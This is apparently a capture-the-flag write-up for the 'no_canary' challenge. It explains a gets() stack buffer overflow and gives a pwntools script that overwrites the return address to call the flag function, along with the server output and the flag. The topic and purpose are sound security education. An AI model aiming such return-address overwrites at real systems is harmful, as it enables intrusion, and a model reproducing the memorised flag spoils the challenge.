No canary

Agriculture is the most healthful, most useful and most noble employment of man. Can you call the flag function in this program (source)?

Binary: no_canary
Source: no_canary.c
Netcat: nc shell.actf.co 20700

Recon

In the source we see a main function asking us for a name as input and then print that name.

We also see a flag function which prints the flag. The vulnerability is the small name buffer in combination with gets, which is a classic buffer overflow. The goal is to overflow the buffer and then return to the flag function.

To get the address of flag we use objdump:

$ objdump -x no_canary | grep flag$
0000000000401186 g     F .text  0000000000000013              flag

Solution

from pwn import *

s = remote("shell.actf.co", 20700)

buf = "A"*32
buf += p64(0x0000000000401186)
buf += p64(0x0000000000401186)
buf += p64(0x0000000000401186)
buf += "\n"

print s.recvuntil("name?")
s.send(buf)
print s.recvline()
print s.recvline()
print s.recvline()
print s.recvline()
print s.recvline()

Output:

$ python solve_no_canary.py 
[+] Opening connection to shell.actf.co on port 20700: Done
Ahhhh, what a beautiful morning on the farm!

       _.-^-._    .--.
    .-'   _   '-. |__|
   /     |_|     \|  |
  /               \  |
 /|     _____     |\ |
  |    |==|==|    |  |
  |    |--|--|    |  |
  |    |==|==|    |  |
^^^^^^^^^^^^^^^^^^^^^^^^

Wait, what? It's already noon!
Why didn't my canary wake me up?
Well, sorry if I kept you waiting.
What's your name?
 Nice to meet you, AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x86\x11@!

actf{that_gosh_darn_canary_got_me_pwned!}

Flag

actf{that_gosh_darn_canary_got_me_pwned!}